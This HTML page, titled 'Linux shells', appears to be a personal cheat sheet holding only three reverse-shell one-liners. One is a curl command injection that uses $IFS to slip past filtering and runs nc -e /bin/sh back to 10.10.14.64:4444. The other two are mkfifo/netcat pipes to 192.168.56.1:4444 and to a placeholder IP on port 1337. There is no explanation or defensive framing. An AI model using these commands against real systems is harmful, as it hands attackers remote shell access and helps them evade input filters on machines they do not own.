<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Linux shells</title>
</head><body>curl http://10.10.14.64:8000/$(nc.traditional$IFS-e/bin/sh$IFS'10.10.14.64:$IFS'4444')<br/>
<br/>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.56.1 4444 &gt;/tmp/f &nbsp;<br/>
<br/>
<span style="color: #000000"><span style="font-family: Arial"><span style="font-size: 10pt"><b>touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | nc &nbsp;&lt;ip&gt; 1337 &gt; /tmp/f </b></span></span></span>&nbsp; </body></html>